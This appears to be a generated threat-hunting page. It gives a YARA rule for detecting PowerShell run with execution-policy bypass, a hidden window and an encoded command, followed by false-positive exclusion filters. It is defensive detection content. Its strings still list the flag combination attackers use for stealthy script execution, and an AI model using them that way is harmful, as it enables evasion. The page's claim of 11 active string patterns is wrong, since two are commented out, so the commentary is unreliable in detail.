Adversaries may use PowerShell to execute malicious scripts, leveraging its commonality and integration with Azure environments to evade detection. SOC teams should proactively hunt for this behavior to identify potential malware activity that may bypass traditional detection mechanisms.
YARA Rule
rule GEN_PowerShell
{
meta:
description = "Generic PowerShell Malware Rule"
author = "https://github.com/interleaved"
strings:
$s1 = "powershell"
$s2 = "-ep bypass" nocase
$s3 = "-nop" nocase
$s10 = "-executionpolicy bypass" nocase
$s4 = "-win hidden" nocase
$s5 = "-windowstyle hidden" nocase
$s11 = "-w hidden" nocase
/*$s6 = "-noni" fullword ascii*/
/*$s7 = "-noninteractive" fullword ascii*/
$s8 = "-enc" nocase
$s9 = "-encodedcommand" nocase
condition:
$s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9))
}This YARA rule can be deployed in the following contexts:
This rule contains 11 string patterns in its detection logic.
Scenario: Scheduled job running a legitimate PowerShell script for system maintenance
Filter/Exclusion: ProcessName == "schtasks.exe" AND FileName == "C:\\Windows\\System32\\schtasks.exe"
Scenario: Admin using PowerShell to configure group policy or registry settings
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Set-ItemProperty%"
Scenario: PowerShell script used for software deployment via Microsoft Intune or SCCM
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Invoke-Command -ComputerName%"
Scenario: System using PowerShell for log parsing or monitoring with tools like Splunk or ELK
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Import-CSV%"
Scenario: PowerShell script used for automated backup or data synchronization
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Copy-Item -Path C:\\Backups\\%"